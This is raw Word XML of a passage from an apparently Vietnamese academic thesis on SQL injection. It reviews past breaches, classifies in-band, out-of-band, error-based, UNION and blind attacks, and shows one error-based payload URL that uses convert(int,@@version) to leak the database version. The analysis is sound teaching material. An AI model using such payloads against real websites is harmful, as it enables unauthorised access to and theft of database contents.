    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 6/2003, Jeremiah Jacks tiếp tục tấn công PetCo.com (</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.securityfocus.com/news/6194</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), thu được thông tin thẻ tín dụng của 500.000 khách hàng qua lỗ hổng SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ngày 17 tháng 6 năm 2005, Master Card cảnh báo khách hàng có sự vi phạm bảo mật trong hệ thống Card Systems Solutions, đây cũng là vụ tấn công lớn nhất được ghi nhận liên quan đến SQL injection (</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.ftc.gov/os/caselist/0523148/0523148complaint.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), kẻ tấn công đã tiếp cận hơn 40 triệu thẻ tín dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 8 năm 2007, United Nations Web site (</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="3152A9"/>
        </w:rPr>
        <w:t>www.un.org</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) bị thay đổi giao diện thông qua lỗ hổng SQL injection, hiển thị thông điệp bài Mỹ (</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://news.cnet.com/8301-10784_3-9758843-7.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tháng 2 năm 2009, một nhóm hacker Rumai sử dụng lỗ hổng SQL injection khai thác Web sites Kaspersky, F-Secure, và Bit-Defender. Nhóm </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hacker này cũng đã từng tấn công các website lớn như: RBS WorldPay, CNET.com, BT.com, Tiscali.co.uk, và national-lottery.co.uk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 4 năm 2011, Barracuda Networks Web site (barracudanetworks.com) mắc lỗ hổng SQL injection, toàn bộ CSDL bị công khai gồm cả thông tin đăng nhập và mật khẩu đã mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 5 năm 2011, LuzSec chiếm quyền một loạt website của Sony (sonypictures.com, SonyMusic.gr, and SonyMusic.co.jp). LulzSec tuyên bố có thể mật khẩu, email hàng triệu khách hàng của Sony</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nếu như trước đây, các hacker thường chiếm quyền điều khiển Website để ghi điểm với các nhóm hacker khác, hoặc truyền bá, để lại một tin nhắn cụ thể. Tuy nhiên, ngày nay các hacker khai thác với mục đích cụ thể, thường là tài chính. Việc tấn công ngày càng được thực hiện âm thầm, lặng lẽ. Đồng nghĩa với đó là hậu quả của tấn công ngày càng nghiêm trọng. Trong phần tiế</w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>p theo, luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ đi sâu vào một kiểu khai thác lỗ hổng SQL injection nói chung, và khai thác kiểu Blind SQL injection nói riêng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc459374313"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Khai thác lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một câu hỏi được đặt ra là: Sau khi xác định được một vị trí – đầu vào (EntryPoint) mắc lỗi, cần phải làm gì với nó ? Khi đó, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoàn toàn có thể tương tác được với CSDL. Trong nhiều năm qua, đã có nhiều phương pháp, nghiên cứu về cách để khai thác (Exploit) lỗ hổng SQL injection. Trong phần này sẽ trình bày các kỹ thuật cho phép, hoặc lấy thông tin từ CSDL cho trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="0034667B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc458409268"/>
      <w:bookmarkStart w:id="15" w:name="_Toc458409338"/>
      <w:bookmarkStart w:id="16" w:name="_Toc458433464"/>
      <w:bookmarkStart w:id="17" w:name="_Toc459373881"/>
      <w:bookmarkStart w:id="18" w:name="_Toc459373941"/>
      <w:bookmarkStart w:id="19" w:name="_Toc459374314"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc459374315"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phân biệt các hình thức tấn công SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trên thế giới có nhiều tài liệu nghiên cứu về các hình thức tấn công, khai thác lỗ hổng SQL injection. Các tài liệu này thường nói khá chi tiết về phương pháp, cách thức tấn công cho một hệ quản trị CSDL (DBMS) cụ thể, tuy nhiên lại thiếu cái nhìn tổng quan về các hình thức tấn công nói chung. Thông thường, để phân biệt một dạng vấn đề thì cần phải dựa trên một, hoặc nhiều tiêu chí nào đó. Đối với tấn công SQL injection, để phân loại có thể dựa theo 2 tiêu chí:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cách để nhận được kết quả trả về của truy vấn SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cách để lấy được thông tin từ kết quả trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại sao lại phân chia như vậy ? Trong ví dụ ở phần trên đã trình bày về hai ví dụ ứng dụng mắc lỗi SQL injection. Tuy vậy, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">đó là những ví dụ cơ bản, và đơn giản nhất. Trong thực tế, có nhiều trường hợp các vị trí mắc lỗi khá khó khăn để lấy được dữ liệu, kết quả trả về của truy vấn SQL. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên về tiêu chí: “Cách để nhận được kết quả trả về của truy vấn SQL”. Thông thường, kết quả truy vấn của câu lệnh SQL sẽ được trả về qua lớp logic, rồi từ đó hiển thị xuống lớp trình bày (ví dụ mô hình 3-lớp). Nhưng đó là với trường hợp câu lệnh đó được thực hiện vào kết quả trả về trực tiếp qua lớp logic. Thực tế, có nhiều ứng dụng sau khi thực hiện xong truy vấn không trả về kết quả cho lớp trung gian. Chính vì thế, nếu chỉ căn cứ theo cách truyền thống thì không thể nào nhận được dữ liệu trả về. Chính vì thế, dựa vào cách mà người dung nhận kết quả truy vấn SQL trả về, có thể chia làm hai dạng: Tấn công dạng In of Band và Tấn công Out of Band.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công dạng In of Band là dạng tấn công cơ bản mà </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ đi sâu phân tích: Kết quả trả truy vấn SQL trả về trực tiếp cho trình duyệt của người dùng. Thực hiện phân tích thông tin mà trình duyệt nhận được, kẻ tấn công có thể trích xuất ra được các thông tin mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công dạng Out of Band ngược lại với In of Band. Kết quả của truy vấn không trả về trực tiếp cho trình duyệt của người dùng. Để có thể nhận được kết quả truy vấn, kẻ tấn công sẽ phải sử dụng kỹ thuật để nhận kết quả này, qua một kênh khác: Qua đọc ghi file, qua truy vấn HTTP/ truy vấn DNS… Trong phần tiếp theo sẽ trình bày chi tiết hơn về loại hình tấn công này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khi mà đã nhận được kết quả trả về của truy vấn SQL, thì một vấn đề tiếp theo đặt ra là: Làm thế nào để có thể trích xuất, lấy được thông tin từ kết quả này. Bởi vì kết quả trả về phải trải qua lớp logic trung gian, lớp này thực hiện tính toán, hiển thị ra dạng mã HTML, rồi mới trả về trình duyệt cho người dùng. Nếu như câu truy vấn đơn giản nhất: “SELECT @@version” sẽ trả về thông tin phiên bản của DBMS, thì yêu cầu đặt ra phải tìm được thông tin đó (có độ dài từ 20 cho đến 50 từ) trong toàn bộ dữ liệu HTML trả về. Có nhiều kỹ thuật để trích xuất, lấy thông tin. Tuy nhiên, việc sử dụng kỹ thuật nào lại phụ thuộc vào cách mà lớp logic xử lý và hiển thị kết quả của câu truy vấn SQL. Thông thường các kỹ thuật cơ bản là:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng thông báo lỗi (Error Message).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng mệnh đề UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công Blind SQL injection sử dụng mệnh đề điều kiện.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> đó, tấn công sử dụng thông báo lỗi và sử dụng mệnh đề UNION được xếp vào dạng non-blind. Có nghĩa là, kết quả trả về dạng tường minh ngay trong kết quả HTML trả về. Cụ thể, thông tin @@version sẽ trả về trực tiếp trong mã HTML. Trong nhiều trường hợp, ứng dụng web không trả về trong HTML. Trong ví dụ URL truy cập CMS quản trị ở trên, nếu thông tin truy cập đúng thì người dùng sẽ được vào trang admin.php, nếu sai sẽ ở lại trang login.php. Như vậy, kết quả trả về chỉ là: YES/NO, được vào trang admin hay không. Để có thể trích xuất được dữ liệu trong trường hợp này, cần phải sử dụng các mệnh đề điều kiện.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần tiếp theo sẽ lần lượt đi vào cụ thể của các dạng tấn công đã nói ở trên. Đầu tiên là hai dạng tấn đơn giản, và cơ bản nhất: Tấn công non-blind sử dụng thông báo lỗi và mệnh đề UNION. Tiếp theo, sẽ trình bày về tấn công Out-of-band. Về các kỹ thuật tấn công Blind SQL injection cơ bản, trong mục 3 của chương sẽ đi sâu về vấn đề này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc459374316"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công sử dụng thông báo lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>thông báo lỗi là dạng cơ bản nhất của tấn công SQL injection. Tấn công này khai thác việc xử lý lỗi không tốt trong mã nguồn ứng dụng. Thông thường, khi thực hiện một câu truy vấn SQL sai: Sai về mặt cú pháp, mặc logic… DBMS sẽ trả về thông báo lỗi. LTV do sai sót đã hiển thị lại thông báo lỗi này cho phía trình duyệt. Lợi dụng điểm này, kẻ tấn công có thể sử dụng để trích xuất thông tin trong CSDL. Cần lưu ý là: vì thông báo lỗi là của DBMS, nên sẽ phụ thuộc vào loại DBMS sử dụng: MySQL một kiểu, MSSQL Server một kiểu, và Oracle một kiểu khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ sau đây, ứng dụng hiển thị chi tiết về thông tin lỗi. Sau khi thêm một dấu nháy đơn (‘) vào biến trên URL, câu lệnh SQL được sinh ra sẽ trở nên sai cú pháp vì thừa 1 dấu nháy đơn, dẫn đến không đóng được chuỗi và tạo ra thông báo lỗi cú pháp (syntax error). Vì sử dụng DBMS là Microsoft SQL Server nên thông báo sẽ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4017E211" wp14:editId="6F4876DF">
            <wp:extent cx="5476875" cy="17526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rcRect r="8287" b="8148"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5476875" cy="175260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2" w:name="_Toc458436415"/>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3</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Thông báo lỗi của MSSQL Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong trường hợp DBMS sử dụng MySQL Server, thông báo lỗi c</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ó dạng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ERROR 1064 (42000): You have an error in your SQL syntax; check the manual</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>that corresponds to your MySQL server version for the right syntax to use</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>near ’’ at line 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông thường, kỹ thuật được sử dụng để trích xuất dữ liệu trong trường hợp này là: làm thế nào đó để thông tin cần lấy được in ra trong thông báo lỗi. Một trong những cách đó là tạo ra các ngoại lệ (exception). Thông thường sẽ đưa thông tin cần lấy (dạng string) làm đầu vào không hợp lệ cho các hàm, như các hàm nhận đầu vào là số nguyên (int). Khi đó sẽ có thông báo chi tiết rằng: &lt;dữ liệu cần lấy&gt; không phải dạng số nguyên. Một dạng mã tấn công như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="001067FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.vuln-s</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ite.com/authorprofile.asp?id=46 and 1=convert(int,@@version)—</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4A053AE7" wp14:editId="45B18D5B">
            <wp:extent cx="5743575" cy="188595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1"/>
                    <a:srcRect r="3806" b="17308"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5743575" cy="188595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3" w:name="_Toc458436416"/>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4</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Lấy thông tin phiên bản MSSQL Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bằng việc đưa chuỗi thông tin phiên bản là đầu vào cho hàm convert sang int, kẻ tấn công đã buộc ứng dụng phải đưa ra thông báo lỗi chứa chi tiết thông tin phiên. Tiếp tục khai thác, kẻ tấn công có thể lấy được bất kỳ thông tin mong muốn. Ví dụ như lấy thông tin về tên CSDL, thông tin về tên bảng, tên cột:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4788A2F1" wp14:editId="5FDFCAF2">
            <wp:extent cx="5972175" cy="21304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2"/>
